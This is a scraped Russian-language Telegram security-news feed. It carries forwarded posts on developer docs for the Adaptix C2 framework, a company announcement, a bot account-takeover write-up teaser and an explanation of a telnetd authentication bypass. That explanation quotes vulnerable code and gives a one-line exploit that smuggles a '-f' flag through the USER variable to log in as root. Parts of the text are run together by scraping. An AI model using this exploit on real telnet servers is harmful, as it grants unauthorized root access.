Forwarded from Adaptix Framework
На выходных по чуть закидывал, вот доки по разработке (совместимость - для следующего релиза 1.1):
* Teamserver Interface + API: https://adaptix-framework.gitbook.io/adaptix-framework/development/teamserver-interface
* Events and Hooks (new feature): https://adaptix-framework.gitbook.io/adaptix-framework/development/teamserver-interface/events-and-hooks
* Extenders development: https://adaptix-framework.gitbook.io/adaptix-framework/development/extenders
* Teamserver Interface + API: https://adaptix-framework.gitbook.io/adaptix-framework/development/teamserver-interface
* Events and Hooks (new feature): https://adaptix-framework.gitbook.io/adaptix-framework/development/teamserver-interface/events-and-hooks
* Extenders development: https://adaptix-framework.gitbook.io/adaptix-framework/development/extenders
❤1
Forwarded from HaHacking
В этот раз: обход аутентификации
root! С публичным PoCCVE-2026-24061 — CVSS (v3) ~9.8, Improper Neutralization of Argument Delimiters in a Command / Argument Injection
telnetd: появилась тут и была с нами 10+ лет (GNU InetUtils v1.9.3 – v2.7 / 2015 – 2025 гг.);USER, чтобы починить автовход для случаев, когда не была доступна аутентификация Kerberos.Сервер
telnetd обращается к /usr/bin/login (обычно работает из-под root)USER – вместо %U:...
char *login_invocation =
PATH_LOGIN " -p -h %h %?T{-t %T} -d %L %?u{-u %u}{%U}"
...
...
case 'U':
return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");
...
/usr/bin/login есть флаг -f — пропустить аутентификацию! (например, для автовхода getty)Ему даже можно передать username / UID пользователя:
login [-p] [-s shell] [-h host] [-H] [[-f] username|UID]; // Например, root USER не нормализуется; Возможно поместить туда дополнительные флаги для /usr/bin/logintelnet провести автовход (флаги -a / --login):USER='-f qwqoro' telnet -a 127.0.0.1
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
www.opennet.ru
Создатель systemd и мэйнтейнер VFS ушли из Microsoft и основали компанию Amutable
Леннарт Поттеринг, Кристиан Браунер и Крис Кюль, до последнего времени работавшие в Microsoft, объявили о создании компании Amutable. Компания зарегистрирована в Германии и в качестве своей миссии упоминает обеспечение криптографически верифицируемой целостности…
🔗Ссылка:
https://opennet.ru/64688/
https://opennet.ru/64688/
Forwarded from [DeteAct] Оценка защищённости
Захват аккаунта через telegram-бот: от своего номера к чужому профилю
Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных.
Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/
Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных.
Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/
Deteact - Тестирование на проникновение. Информационная безопасность
Захват аккаунта через telegram-бот: от своего номера к чужому профилю - Deteact
Автор баги: arkiix Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки…